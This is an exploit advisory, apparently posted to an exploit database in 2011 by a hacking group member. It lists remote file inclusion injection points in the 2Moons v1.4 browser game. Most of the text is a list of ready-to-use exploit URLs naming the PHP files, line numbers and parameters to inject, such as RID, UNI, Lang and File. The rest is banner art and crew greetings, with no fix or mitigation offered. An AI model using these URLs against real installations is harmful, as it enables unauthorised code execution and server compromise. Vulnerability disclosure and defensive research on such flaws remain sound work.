2Moons version 1.4 suffers from remote file inclusion vulnerabilities.
c354dca1b44c5e36d274ff00015fd1a0fc96a63a0811820638db289954a8ac1e
==============================
2Moons v1.4 RFI Vulnerability
==============================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 . .--. .--. .---. . 1
1 .'| ) ) / | 0
0 | --: --: / .-.| .-. . . 1
1 | ) ) / ( |( ) | | 0
0 '---' `--' `--' ' `-'`-`-'`-`--| 1
1 ; 0
0 Site : 1337day.com `-' 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
#######################################################
# Vendor: http://2moons.googlecode.com/files/2Moons%20v1.4.rar
# Date: 2011-07-27
# Author : indoushka
+++=[ Dz Offenders Cr3w ]=+++
# KedAns-Dz * Caddy-Dz * Kalashinkov3
# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz
# Contact : ind0ushka@hotmail.com
# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
########################################################################
# Exploit By indoushka
-------------
Function: require_once File: CombatReport.php Line: 47
Exploit: http://localhost/2Moons/CombatReport.php?RID=[EV!L]
##################################################
Function: require_once File: common.php Line: 86
Exploit: http://localhost/2Moons/includes/common.php?UNI=[EV!L]
##################################################
Function: require_once File: class.FlyingFleetHandler.php Line: 59
Exploit: http://localhost/2Moons/includes/classes/class.FlyingFleetHandler.php?MissionsPattern[CurrentFleet[fleet_mission]]=[EV!L]
##################################################
Function: require_once File: class.FlyingFleetHandler.php Line: 59
Exploit: http://localhost/2Moons/includes/classes/class.FlyingFleetHandler.php?CurrentFleet[fleet_mission]]=[EV!L]
##################################################
Function: require File: class.Lang.php Line: 56
Exploit: http://localhost/2Moons/includes/classes/class.Lang.php?Lang=[EV!L]
##################################################
Function: require File: class.Lang.php Line: 138
Exploit: http://localhost/2Moons/includes/classes/class.Lang.php?File=[EV!L]
##################################################
Function: require File: class.Lang.php Line: 139
Exploit: http://localhost/2Moons/includes/classes/class.Lang.php?File=[EV!L]
##################################################
Function: require File: class.Lang.php Line: 155
Exploit: http://localhost/2Moons/includes/classes/class.Lang.php?LANGUAGE=[EV!L]
##################################################
Function: require File: class.Lang.php Line: 155
Exploit: http://localhost/2Moons/includes/classes/class.Lang.php?File=[EV!L]
##################################################
Function: require File: class.Records.php Line: 81
Exploit: http://localhost/2Moons/includes/classes/class.Records.php?File=[EV!L]
##################################################
Function: require_once File: ShowTopKB.php Line: 45
Exploit: http://localhost/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L]
##################################################
Function: require_once File: Smarty.class.php Line: 694
Exploit: http://localhost/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L]
##################################################
Function: require File: ShowModVersionPage.php Line: 39
Exploit: http://localhost/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L]
##################################################
Function: include File: smarty_internal_resource_php.php Line: 122
Exploit: http://localhost/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L]
##################################################
Function: require_once File: smarty_internal_templatecompilerbase.php Line: 337
Exploit: http://localhost/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L]
##################################################
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------